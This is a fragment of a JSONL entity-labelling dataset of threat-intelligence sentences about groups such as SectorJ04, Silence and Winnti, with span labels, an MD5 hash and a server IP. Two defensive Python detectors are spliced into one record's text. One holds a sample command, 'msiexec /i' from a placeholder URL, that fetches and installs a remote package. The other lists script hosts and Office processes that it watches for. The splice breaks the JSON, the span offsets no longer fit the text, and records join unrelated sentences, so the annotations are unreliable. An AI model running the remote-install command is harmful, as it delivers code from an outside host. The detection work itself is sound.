"end": 17401, "label": "Organization"}, {"start": 17411, "end": 17418, "label": "Organization"}, {"start": 17533, "end": 17540, "label": "Organization"}, {"start": 17635, "end": 17642, "label": "Organization"}, {"start": 17731, "end": 17738, "label": "Organization"}, {"start": 17791, "end": 17795, "label": "Organization"}, {"start": 17837, "end": 17845, "label": "Organization"}, {"start": 17954, "end": 17963, "label": "Organization"}, {"start": 18019, "end": 18027, "label": "Organization"}, {"start": 18085, "end": 18091, "label": "System"}, {"start": 18111, "end": 18118, "label": "Organization"}, {"start": 18357, "end": 18361, "label": "Organization"}, {"start": 18453, "end": 18456, "label": "System"}, {"start": 18537, "end": 18545, "label": "Organization"}, {"start": 18592, "end": 18599, "label": "Organization"}, {"start": 18602, "end": 18609, "label": "Organization"}, {"start": 18841, "end": 18854, "label": "Organization"}, {"start": 19013, "end": 19023, "label": "Organization"}, {"start": 19250, "end": 19254, "label": "Indicator"}, {"start": 19458, "end": 19469, "label": "Organization"}, {"start": 19720, "end": 19726, "label": "Organization"}, {"start": 19788, "end": 19797, "label": "Organization"}, {"start": 19924, "end": 19933, "label": "Organization"}, {"start": 19966, "end": 19975, "label": "Organization"}, {"start": 20031, "end": 20049, "label": "Organization"}, {"start": 20201, "end": 20210, "label": "Organization"}, {"start": 20437, "end": 20448, "label": "Organization"}, {"start": 20645, "end": 20655, "label": "Organization"}, {"start": 20672, "end": 20681, "label": "Organization"}, {"start": 20763, "end": 20772, "label": "Organization"}, {"start": 20826, "end": 20830, "label": "System"}, {"start": 20865, "end": 20879, "label": "Indicator"}, {"start": 20894, "end": 20903, "label": "Organization"}, {"start": 20947, "end": 20955, "label": "Organization"}, {"start": 21024, "end": 21033, "label": "Organization"}, {"start": 21067, "end": 21089, "label": 
"Organization"}, {"start": 21267, "end": 21274, "label": "Organization"}, {"start": 21277, "end": 21291, "label": "Organization"}, {"start": 21294, "end": 21299, "label": "Organization"}, {"start": 21302, "end": 21308, "label": "Organization"}, {"start": 21313, "end": 21326, "label": "Organization"}, {"start": 21344, "end": 21353, "label": "Organization"}, {"start": 21393, "end": 21403, "label": "Malware"}, {"start": 21408, "end": 21422, "label": "Malware"}]} {"text": "Kaspersky Lab\u2019s experts calculated the amount of stolen data stored on NetTraveler\u2019s C&C servers to be more than 22 gigabytes . Backdoors are installed in infected systems and SectorJ04 also distributed email stealers , botnet malware and ransomware through those backdoors . Backdoor installed in the infected system distributed additional botnet malware , ransomware and email stealers . SectorJ04 was recently confirmed to use additional backdoor called AdroMut and FlowerPippi , which is used to install other backdoor such as FlawedAmmy RAT on behalf of the MSI file , or to collect system information and send it to the attacker\u2019s server . Although the SectorJ04 group mainly targeted countries located in Europe or North America , it has recently expanded its field of activities to countries located in Southeast Asia and East Asia . The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . A new type of backdoor called AdroMut and a new malware called FlowerPippi was also found coming from SectorJ04 . But after 2019 SectorJ04 has changed its hacking strategy to attack using spam email . The hacking activities of SectorJ04 group , which targeted South Korea in the first half of 2019 , have been continuously discovered . 
Prior to 2019 , the SectorJ04 group conducted large-scale hacking activities for financial gain using exploit kits on websites to install ransomware , such as Locky and GlobeImposter , along with its banking Trojan , on its victims\u2019 computers . In June 2019 , SectorJ04 activity targeting South Korea was observed again , with spam emails written around various themes , including transaction statements , receipts and remittance cards . The SectorJ04 group has carried out large-scale hacking activities targeting South Korea , while also expanding its attacks to Southeast Asian countries such as Taiwan and the Philippines . In June , the SectorJ04 group conducted hacking using spam emails written in various languages , including English , Arabic , Korean and Italian , and the emails were written around various themes , including remittance cards , invoices and tax invoices . Spam emails and attachments written in Chinese were found in May , and the SectorJ04 group at that time targeted industrial sectors such as electronics and telecommunications , international schools and manufacturing . In addition to their preexisting backdoors , ServHelper and FlawedAmmy , they have also been confirmed to use the backdoors called AdroMut and FlowerPippi . AdroMut downloads the ServHelper and FlawedAmmy RAT malware used by the SectorJ04 group from the attacker server and at the same time functions as a backdoor itself . The SectorJ04 group , which has been utilizing the same pattern of infection and the same malware for more than six months , is believed to be attempting to change its infection methods , for example by downloading malware directly from malicious documents without using MSI installation files , changing its spam email format and using new types of backdoor . 
Until 2019 , the SectorJ04 group carried out massive website-based hacking activities that mainly utilized ransomware and banking trojans for financial profit ; since 2019 it has also been carrying out information gathering activities to secure attack resources such as email accounts and system login information from users . The SectorJ04 group has shown a pattern of hacking activities that has changed from targeted attacks to a large-scale distribution of spam . This allows them to expand the range of targets of their hacking activities for financial profit , and in this regard , the SectorJ04 group has been found to have hacked into a company\u2019s internal network by using a spear phishing email targeting executives and employees of certain South Korean companies around February 2019 . The SectorJ04 group carried out intensive hacking on various industrial sectors , including South Korea\u2019s media , manufacturing and universities , around February and March 2019 . SectorJ04 used spear phishing emails to spread malicious Excel or Word files , which downloaded MSI files from the attacker\u2019s server when the malicious documents were opened . The SectorJ04 group conducted hacking activities targeting financial institutions located in India and Hong Kong around April 2019 . The SectorJ04 group carried out hacking activities targeting financial institutions located in Italy and other countries around May 2019 . In late July , the SectorJ04 group used FlawedAmmy RAT to carry out hacking attacks on companies and universities in sectors such as education , recruitment , real estate and semiconductors in South Korea . In early August , the SectorJ04 group carried out extensive hacking activities targeting users around the world , including South Korea , India , Britain , the United States , Germany , Canada , Argentina , Bangladesh and Hong Kong . 
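On the endpoint, the document-to-MSI chain described for SectorJ04 is visible as an Office process creating msiexec.exe with a URL on its command line, and the variant mentioned above that skips the MSI shows up as an Office process spawning a script host instead. The added example below (not ThreatRecon's code) classifies constructed process-creation records shaped like the Image, ParentImage and CommandLine fields of Sysmon Event ID 1 and keeps only the records worth alerting on; the process lists, the severity scheme and the sample records are assumptions made for the example.

```python
"""Flag Office documents that launch the Windows Installer to fetch a remote MSI.

Added example; it is not code from ThreatRecon or any report quoted here.
SectorJ04's lure documents pull an MSI package from the attacker's server
and install the backdoor with it, which on the endpoint appears as
WINWORD.EXE or EXCEL.EXE spawning msiexec.exe with a URL on its command
line. The records below imitate the Image, ParentImage and CommandLine
fields of Sysmon Event ID 1 (process creation) and are constructed; the
process lists and severities are assumptions.
"""
import re
from typing import Dict, List

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INSTALLERS = {"msiexec.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
URL_RX = re.compile(r"(?i)\b(?:https?|ftp)://[^\s\"']+")
QUIET_RX = re.compile(r"(?i)(?:^|\s)/(?:q|qn|qb|quiet)\b")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Dict[str, object]:
    """Return severity and reasons for one process-creation event."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    reasons: List[str] = []
    if child in INSTALLERS:
        url = URL_RX.search(cmd)
        if url:
            reasons.append("remote_msi:" + url.group(0))  # package fetched over the network
        if QUIET_RX.search(cmd):
            reasons.append("quiet_install")  # no UI, typical of malware and mass deployment
        if parent in OFFICE_PARENTS:
            reasons.append("office_spawned_installer")
    elif parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append("office_spawned_script_host")

    if parent in OFFICE_PARENTS and reasons:
        severity = "high"
    elif any(r.startswith("remote_msi:") for r in reasons):
        severity = "medium"  # remote package from a non-Office parent still deserves a look
    else:
        severity = "none"
    return {"severity": severity, "reasons": reasons, "parent": parent, "child": child}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Classify every event and keep only the ones worth alerting on."""
    return [r for r in (classify(e) for e in events) if r["severity"] != "none"]


# Constructed events (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {  # lure spreadsheet installing a package straight from a web server
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": "msiexec.exe /i http://example.invalid/update.msi /q",
    },
    {  # user double-clicking a downloaded installer: local package, no flags
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec.exe /i C:\Users\alice\Downloads\tool.msi",
    },
    {  # the installer service's own helper process
        "ParentImage": r"C:\Windows\System32\services.exe",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"C:\Windows\system32\msiexec.exe /V",
    },
    {  # macro handing off to PowerShell without any MSI
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -w hidden -nop -c \"Start-Sleep 1\"",
    },
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["severity"], alert["parent"], "->", alert["child"], alert["reasons"])
```

Keying on the parent process rather than on msiexec alone is what keeps the rule quiet: the Windows Installer service and ordinary users start msiexec constantly, but an Office application has no business doing so, and a URL in the package path turns an odd event into a strong one.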
Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity . They are one of the most active cyber crime groups in 2019 , and they often modify and tweak their hacking methods and perform periodic hacking activities . Now , Silence is one of the most active threat actors targeting the financial sector . Since we released our original report , Silence: Moving into the darkside , the confirmed damage from Silence's operations has increased fivefold compared to the figures in Group-IB's initial report . Silence started by targeting organizations in Russia , gradually shifting their focus to former Soviet countries , and then the world . Silence also started using Ivoke , a fileless loader , and EDA agent , both written in PowerShell . Silence 2.0: Going Global is an extension of our original report , Silence: Moving into the Darkside , which remains the most significant contribution to the research on the group and is the first such report to reveal Silence\u2019s activity . Since the report\u2019s release in September 2018 , Group-IB\u2019s Threat Intelligence team has detected 16 campaigns targeting banks launched by Silence . Like the majority of APT groups , Silence uses phishing as its infection vector . In the last successful attack described in Silence: Moving into the darkside , dated April 2018 , the hackers siphoned off about $150 , 000 through ATMs in a single night . Prior to April 2018 , as described in Group-IB\u2019s Silence: Moving into the darkside report , Silence\u2019s target interests were primarily limited to former Soviet and Eastern European countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . In 2018 , Silence conducted test campaigns to update their database of current targets and expand their attack geography . 
The threat actor\u2019s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users . Silence has conducted at least three campaigns using recon emails , followed by malicious mail sent to an updated recipient list . Group-IB has also detected recon emails sent out to New Zealand . Since our last public report , Silence has sent out more than 170 , 000 recon emails to banks in Russia , the former Soviet Union , Asia and Europe . In November 2018 , Silence tried their hand at targeting the Asian market for the first time in their history . In total , Silence sent out about 80 , 000 emails , with more than half of them targeting Taiwan , Malaysia , and South Korea . From 16 October 2018 to 1 January 2019 , Silence sent out about 84 , 000 emails in Russia alone to update their address database . 
As part of their phishing campaigns , Silence still uses Microsoft Office documents with macros or exploits , CHM files , and .LNK shortcuts as malicious attachments .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 71, "end": 84, "label": "Organization"}, {"start": 176, "end": 185, "label": "Organization"}, {"start": 203, "end": 208, "label": "System"}, {"start": 264, "end": 273, "label": "Malware"}, {"start": 276, "end": 284, "label": "Indicator"}, {"start": 390, "end": 399, "label": "Organization"}, {"start": 457, "end": 464, "label": "Malware"}, {"start": 469, "end": 480, "label": "Malware"}, {"start": 626, "end": 636, "label": "Organization"}, {"start": 659, "end": 668, "label": "Organization"}, {"start": 846, "end": 859, "label": "Indicator"}, {"start": 935, "end": 939, "label": "Indicator"}, {"start": 942, "end": 946, "label": "Indicator"}, {"start": 953, "end": 957, "label": "Indicator"}, {"start": 996, "end": 1003, "label": "System"}, {"start": 1008, "end": 1019, "label": "System"}, {"start": 1124, "end": 1131, "label": "Malware"}, {"start": 1157, "end": 1168, "label": "Malware"}, {"start": 1196, "end": 1205, "label": "Organization"}, {"start": 1223, "end": 1232, "label": "Organization"}, {"start": 1321, "end": 1330, "label": "Organization"}, {"start": 1450, "end": 1459, "label": "Organization"}, {"start": 1532, "end": 1544, "label": "Malware"}, {"start": 1589, "end": 1594, "label": "Malware"}, {"start": 1599, "end": 1612, "label": "Malware"}, {"start": 1630, "end": 1637, "label": "Organization"}, {"start": 1638, "end": 1644, "label": "Malware"}, {"start": 1700, "end": 1711, "label": "Organization"}, {"start": 1771, "end": 1777, "label": "System"}, {"start": 1886, "end": 1895, "label": "Organization"}, {"start": 2091, "end": 2100, "label": "Organization"}, {"start": 2136, "end": 2142, "label": "System"}, {"start": 2232, "end": 2238, "label": "System"}, {"start": 2335, "end": 2341, "label": "System"}, {"start": 2405, "end": 2414, 
"label": "Organization"}, {"start": 2470, "end": 2481, "label": "Organization"}, {"start": 2486, "end": 2504, "label": "Organization"}, {"start": 2507, "end": 2520, "label": "Organization"}, {"start": 2533, "end": 2546, "label": "Organization"}, {"start": 2590, "end": 2600, "label": "Malware"}, {"start": 2605, "end": 2615, "label": "Malware"}, {"start": 2675, "end": 2682, "label": "Malware"}, {"start": 2687, "end": 2698, "label": "Malware"}, {"start": 2731, "end": 2741, "label": "Malware"}, {"start": 2746, "end": 2756, "label": "Malware"}, {"start": 2773, "end": 2782, "label": "Organization"}, {"start": 2876, "end": 2885, "label": "Organization"}, {"start": 3179, "end": 3184, "label": "System"}, {"start": 3239, "end": 3248, "label": "Organization"}, {"start": 3332, "end": 3342, "label": "Malware"}, {"start": 3347, "end": 3362, "label": "Malware"}, {"start": 3485, "end": 3490, "label": "System"}, {"start": 3557, "end": 3566, "label": "Organization"}, {"start": 3811, "end": 3820, "label": "Organization"}, {"start": 3917, "end": 3922, "label": "System"}, {"start": 3982, "end": 3991, "label": "Organization"}, {"start": 4015, "end": 4024, "label": "Organization"}, {"start": 4117, "end": 4122, "label": "Organization"}, {"start": 4125, "end": 4138, "label": "Organization"}, {"start": 4143, "end": 4155, "label": "Organization"}, {"start": 4191, "end": 4200, "label": "Organization"}, {"start": 4225, "end": 4230, "label": "System"}, {"start": 4270, "end": 4274, "label": "System"}, {"start": 4321, "end": 4331, "label": "Organization"}, {"start": 4379, "end": 4388, "label": "Organization"}, {"start": 4434, "end": 4443, "label": "Organization"}, {"start": 4508, "end": 4517, "label": "Organization"}, {"start": 4565, "end": 4574, "label": "Organization"}, {"start": 4658, "end": 4667, "label": "Organization"}, {"start": 4772, "end": 4781, "label": "Organization"}, {"start": 4784, "end": 4796, "label": "Organization"}, {"start": 4799, "end": 4810, "label": "Organization"}, 
{"start": 4815, "end": 4829, "label": "Organization"}, {"start": 4869, "end": 4878, "label": "Organization"}, {"start": 5090, "end": 5096, "label": "System"}, {"start": 5107, "end": 5112, "label": "System"}, {"start": 5264, "end": 5270, "label": "Organization"}, {"start": 5383, "end": 5390, "label": "Organization"}, {"start": 5445, "end": 5454, "label": "Organization"}, {"start": 5504, "end": 5512, "label": "Organization"}, {"start": 5637, "end": 5647, "label": "Organization"}, {"start": 5665, "end": 5672, "label": "Organization"}, {"start": 5801, "end": 5808, "label": "Organization"}, {"start": 5828, "end": 5833, "label": "Malware"}, {"start": 5860, "end": 5869, "label": "Malware"}, {"start": 5888, "end": 5898, "label": "System"}, {"start": 5914, "end": 5926, "label": "Organization"}, {"start": 6117, "end": 6135, "label": "Organization"}, {"start": 6185, "end": 6195, "label": "Organization"}, {"start": 6257, "end": 6262, "label": "Organization"}, {"start": 6275, "end": 6282, "label": "Organization"}, {"start": 6319, "end": 6326, "label": "Organization"}, {"start": 6580, "end": 6590, "label": "Organization"}, {"start": 6820, "end": 6827, "label": "Organization"}, {"start": 6944, "end": 6951, "label": "Organization"}, {"start": 6952, "end": 6958, "label": "System"}, {"start": 7005, "end": 7022, "label": "Indicator"}, {"start": 7087, "end": 7092, "label": "Organization"}, {"start": 7095, "end": 7102, "label": "Organization"}, {"start": 7154, "end": 7160, "label": "System"}, {"start": 7226, "end": 7234, "label": "Organization"}, {"start": 7253, "end": 7265, "label": "Indicator"}, {"start": 7323, "end": 7330, "label": "Organization"}, {"start": 7370, "end": 7376, "label": "System"}, {"start": 7380, "end": 7385, "label": "Organization"}, {"start": 7461, "end": 7468, "label": "Organization"}, {"start": 7503, "end": 7515, "label": "Organization"}, {"start": 7565, "end": 7572, "label": "Organization"}, {"start": 7597, "end": 7603, "label": "System"}, {"start": 7720, "end": 
7730, "label": "Organization"}, {"start": 7774, "end": 7783, "label": "Organization"}, {"start": 7991, "end": 7998, "label": "Organization"}, {"start": 8023, "end": 8029, "label": "System"}, {"start": 8119, "end": 8126, "label": "Organization"}, {"start": 8138, "end": 8147, "label": "Organization"}, {"start": 8207, "end": 8211, "label": "Indicator"}]} {"text": "FireEye believes the Ke3chang attackers likely began attempting to exfiltrate sensitive data shortly thereafter . In the former Soviet Union , Silence targeted banks in Kyrgyzstan , Kazakhstan , and Ukraine .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 21, "end": 29, "label": "Organization"}, {"start": 143, "end": 150, "label": "Organization"}, {"start": 160, "end": 165, "label": "Organization"}]} {"text": "This report details some of the technical findings of the Lazarus Group\u2019s malware , observed by Novetta during Operation Blockbuster . In 2019 , Group-IB also observed the use of a new fileless PowerShell loader called Ivoke .", "spans": [{"start": 58, "end": 65, "label": "Organization"}, {"start": 96, "end": 103, "label": "Organization"}, {"start": 111, "end": 132, "label": "Organization"}, {"start": 145, "end": 153, "label": "Organization"}, {"start": 194, "end": 204, "label": "System"}, {"start": 219, "end": 224, "label": "Indicator"}]} {"text": "The Lazarus Group was first identified in Novetta\u2019s report Operation Blockbuster in February 2016 . The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer .", "spans": [{"start": 4, "end": 11, "label": "Organization"}, {"start": 42, "end": 51, "label": "Organization"}, {"start": 104, "end": 123, "label": "Indicator"}]} {"text": "FireEye has not identified APT33 using SHAPESHIFT , but APT33 is the only group FireEye has seen to use DROPSHOT . 
As the CnC server , Silence uses a CnC-3 server running Windows , from which they send commands to download additional modules .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 27, "end": 32, "label": "Organization"}, {"start": 39, "end": 49, "label": "System"}, {"start": 56, "end": 61, "label": "Organization"}, {"start": 80, "end": 87, "label": "Organization"}, {"start": 104, "end": 112, "label": "System"}, {"start": 135, "end": 142, "label": "Organization"}, {"start": 147, "end": 159, "label": "Malware"}, {"start": 168, "end": 175, "label": "System"}]} {"text": "In 2018 , Kaspersky Labs published a report that analyzed the Turla threat group . To control ATMs , the group uses the Atmosphere Trojan , which is unique to Silence , or a program called xfs-disp.exe . In addition , Silence downloads the reverse proxy programs Silence.ProxyBot and SilenceProxyBot.NET , which are described in detail in the report Silence: moving into the darkside .", "spans": [{"start": 10, "end": 19, "label": "Organization"}, {"start": 58, "end": 63, "label": "Organization"}, {"start": 116, "end": 133, "label": "Malware"}, {"start": 155, "end": 162, "label": "Organization"}, {"start": 185, "end": 197, "label": "Malware"}, {"start": 214, "end": 221, "label": "Organization"}, {"start": 259, "end": 275, "label": "Malware"}, {"start": 280, "end": 299, "label": "Malware"}]} {"text": "Starting in February 2018 , Palo Alto identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States . 
Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability .", "spans": [{"start": 28, "end": 37, "label": "Organization"}, {"start": 95, "end": 107, "label": "Organization"}, {"start": 118, "end": 144, "label": "Organization"}, {"start": 226, "end": 232, "label": "System"}, {"start": 275, "end": 282, "label": "Vulnerability"}, {"start": 291, "end": 305, "label": "Vulnerability"}, {"start": 306, "end": 319, "label": "Vulnerability"}]} {"text": "Proofpoint researchers have observed a well-known Russian-speaking APT actor usually referred to as Turla using a new .NET/MSIL dropper for an existing backdoor called JS/KopiLuwak . Group-IB specialists tracked a massive mailout of emails containing a malicious Microsoft Word attachment titled \u201c\u0414\u043e\u0433\u043e\u0432\u043e\u0440.doc\u201d [Contract.doc] .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 100, "end": 105, "label": "Organization"}, {"start": 128, "end": 135, "label": "System"}, {"start": 168, "end": 180, "label": "Malware"}, {"start": 183, "end": 191, "label": "Organization"}, {"start": 233, "end": 239, "label": "System"}, {"start": 253, "end": 308, "label": "Indicator"}, {"start": 309, "end": 323, "label": "Indicator"}]} {"text": "Insikt Group investigated the domain and hosting infrastructure used by the APT33 group . Silence sent out emails to Russian banks .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 76, "end": 81, "label": "Organization"}, {"start": 90, "end": 97, "label": "Organization"}, {"start": 107, "end": 113, "label": "System"}, {"start": 125, "end": 130, "label": "Organization"}]} {"text": "Symantec tracks the group behind this activity as Blackfly and detects the malware they use as Backdoor.Winnti . 
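The attachment types named above (Office documents with macros or exploits, CHM files, .LNK shortcuts, and a document carrying a CVE-2017-11882 exploit) can be triaged at the mail gateway by format checks rather than by signature. The Python below is an added example written for this page; it is not code from Group-IB or from any of the reports quoted. Every attachment it inspects is constructed inside the script, the file names are invented, and the rules (ShellLink header, ITSF signature, a vbaProject.bin part, the Equation Editor ProgID/CLSID) describe the file formats, not any specific campaign sample.

```python
import io
import zipfile

# Added example; constructed samples, not files from the campaigns described above.

# ShellLinkHeader: HeaderSize 0x0000004C followed by LinkCLSID {00021401-0000-0000-C000-000000000046}
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
CHM_MAGIC = b"ITSF"  # ITSS container signature of compiled HTML Help files
EQUATION_PROGID = b"Equation.3"  # Microsoft Equation 3.0, the component abused by CVE-2017-11882
EQUATION_CLSID = b"0002ce02-0000-0000-c000-000000000046"


def is_lnk(data: bytes) -> bool:
    return data.startswith(LNK_MAGIC)


def is_chm(data: bytes) -> bool:
    return data.startswith(CHM_MAGIC)


def ooxml_has_macros(data: bytes) -> bool:
    """Macro-enabled OOXML documents ship their VBA project as a vbaProject.bin part."""
    if not data.startswith(b"PK"):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(name.lower().endswith("vbaproject.bin") for name in zf.namelist())
    except zipfile.BadZipFile:
        return False


def has_equation_object(data: bytes) -> bool:
    """RTF/OLE documents that embed Equation Editor by ProgID or CLSID."""
    return EQUATION_PROGID in data or EQUATION_CLSID in data.lower()


def triage(filename: str, data: bytes) -> list:
    """Reasons to hold an attachment for analysis; an empty list means nothing was seen."""
    reasons = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if is_lnk(data):
        reasons.append("lnk-shortcut")
        if ext != "lnk":
            reasons.append("extension-mismatch")  # shortcut renamed to look like a document
    if is_chm(data):
        reasons.append("chm-help-file")
        if ext != "chm":
            reasons.append("extension-mismatch")
    if ooxml_has_macros(data):
        reasons.append("office-macro")
    if has_equation_object(data):
        reasons.append("equation-editor-object")
    return reasons


def build_samples() -> dict:
    """Constructed attachments standing in for the lures; none is a real sample."""
    docm = io.BytesIO()
    with zipfile.ZipFile(docm, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 60)
    clean = io.BytesIO()
    with zipfile.ZipFile(clean, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
    rtf = b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata 01050000}}}"
    return {
        "invitation.docm": docm.getvalue(),
        "agenda.docx": clean.getvalue(),
        "contract.doc": rtf,
        "report.doc": LNK_MAGIC + b"\x00" * 56,  # a .LNK disguised with a document name
        "help.chm": CHM_MAGIC + b"\x03\x00\x00\x00" + b"\x00" * 28,
    }


def triage_all(samples: dict = None) -> dict:
    samples = build_samples() if samples is None else samples
    return {name: triage(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, reasons in triage_all().items():
        print(f"{name:18} {'HOLD' if reasons else 'pass'} {reasons}")
```

An embedded Equation Editor object is a legitimate feature, so that rule holds the file for analysis rather than blocking it; the extension-mismatch rule is the one that catches a shortcut or help file renamed to pass as a document.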
The exploit installs Silence\u2019s loader , designed to download backdoors and other malicious programs .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 50, "end": 58, "label": "Organization"}, {"start": 95, "end": 110, "label": "System"}, {"start": 117, "end": 124, "label": "Vulnerability"}, {"start": 134, "end": 143, "label": "Organization"}]} {"text": "As shown within the timeline above , the WINDSHIFT activity observed by Unit 42 falls between January and May of 2018 . Silence conducted a massive phishing campaign posing as the Central Bank of the Russian Federation .", "spans": [{"start": 72, "end": 79, "label": "Organization"}, {"start": 120, "end": 127, "label": "Organization"}, {"start": 180, "end": 192, "label": "Organization"}]} {"text": "Symantec discovered Suckfly , an advanced threat group , conducting targeted attacks using multiple stolen certificates , as well as hacktools and custom malware . Group-IB specialists have established that the aim of the attack was to deliver and launch the second stage of Silence\u2019s Trojan , known as Silence.MainModule .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 20, "end": 27, "label": "Organization"}, {"start": 133, "end": 142, "label": "System"}, {"start": 164, "end": 172, "label": "Organization"}, {"start": 275, "end": 284, "label": "Organization"}, {"start": 285, "end": 291, "label": "Malware"}, {"start": 303, "end": 321, "label": "Malware"}]} {"text": "In April Novetta released its excellent report on the Winnti malware spotted in the operations of Axiom group . Silence attacked financial organisations in the UK . Silence conducted the first stage of their Asian campaign , organising a massive phishing attack aimed at receiving an up-to-date list of current recipients in different countries for further targeted attacks delivering their malicious software . 
The attackers used the server deployed on 6 June 2019 to control compromised workstations in these banks . On 24 March 2019 , Silence.ProxyBot ( MD5 2fe01a04d6beef14555b2cf9a717615c ) was uploaded to VirusTotal from an IP address in Sri Lanka . On October 18th , 2018 , the group sent out emails to British financial companies as part of their preparatory campaign . Group-IB experts established that the server 185.20.187.89 started functioning no later than 28 January 2019 . According to local media reports , in 2019 Silence successfully withdrew money from the Bangladeshi bank twice within 2 months . To do this , the actor may have used a unique tool called Atmosphere , a Trojan developed by Silence to remotely control ATM dispensers , or a similar program called xfs-disp.exe , which the actor may have used in their attack on IT Bank . As we described in the Silence: Moving into the darkside report , Silence has experience with theft using compromised card processing systems . In February 2019 , Russian media reported a Silence attack on IT Bank in the city of Omsk . 
On 16 January 2019 , Silence sent out phishing emails with malicious attachments disguised as invitations to the International Financial Forum iFin-2019 .", "spans": [{"start": 9, "end": 16, "label": "Organization"}, {"start": 54, "end": 60, "label": "Organization"}, {"start": 98, "end": 103, "label": "Organization"}, {"start": 112, "end": 119, "label": "Organization"}, {"start": 129, "end": 138, "label": "Organization"}, {"start": 165, "end": 172, "label": "Organization"}, {"start": 416, "end": 425, "label": "Organization"}, {"start": 511, "end": 516, "label": "Organization"}, {"start": 538, "end": 554, "label": "Malware"}, {"start": 559, "end": 591, "label": "Indicator"}, {"start": 610, "end": 620, "label": "System"}, {"start": 629, "end": 631, "label": "Indicator"}, {"start": 699, "end": 705, "label": "System"}, {"start": 717, "end": 726, "label": "Organization"}, {"start": 777, "end": 785, "label": "Organization"}, {"start": 931, "end": 938, "label": "Organization"}, {"start": 988, "end": 992, "label": "Organization"}, {"start": 1075, "end": 1085, "label": "Malware"}, {"start": 1090, "end": 1096, "label": "Malware"}, {"start": 1110, "end": 1117, "label": "Organization"}, {"start": 1183, "end": 1195, "label": "Indicator"}, {"start": 1250, "end": 1254, "label": "Organization"}, {"start": 1276, "end": 1284, "label": "Organization"}, {"start": 1319, "end": 1326, "label": "Organization"}, {"start": 1511, "end": 1518, "label": "Organization"}, {"start": 1537, "end": 1543, "label": "System"}, {"start": 1617, "end": 1626, "label": "Organization"}]} {"text": "A few days ago , Symantec discovered a new document that appears to be part of the ongoing BlackEnergy APT group attacks against Ukraine . Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails . The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . 
Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.exe with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . Since at least 2011 , these hackers have been using malware to spy on corporate networks . Hackers are targeting high-tech companies as well as chemical and pharmaceutical companies . The hackers will map a company\u2019s network and look for strategically favorable locations for placing their malware . The corporation confirms the Winnti incident and issues the following statement: \u201cThe cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions.\u201d Henkel claims that \u201ca very small portion\u201d of its worldwide IT systems had been affected \u2014 the systems in Germany . A BASF spokeswoman tells us in an email that in July 2015 , hackers had successfully overcome the \u201cfirst levels\u201d of defense . The tool was written by staff of Thyssenkrupp , because the industrial giant\u2014company number eleven\u2014had been spied on by Winnti . Hackers are charged with spying on a manufacturer of gas turbines . The Hong Kong government was spied on by the Winnti hackers . Komplex is a backdoor that has been used by APT28 on OS X and appears to be developed in a similar manner to XAgentOSX . While OceanLotus\u2019 targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam . NewsBeef attacks against Saudi Arabian organizations and individuals are likely to continue . Rapid7 discovered that additional data was placed into the Dropbox accounts under the control of APT10 during the compromise and was able to attribute data that was placed into it as being owned by Visma . Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe . 
